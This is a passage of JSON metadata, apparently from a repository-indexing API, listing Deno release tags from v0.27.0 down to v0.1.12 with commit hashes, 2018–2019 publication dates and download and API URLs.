s_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/Git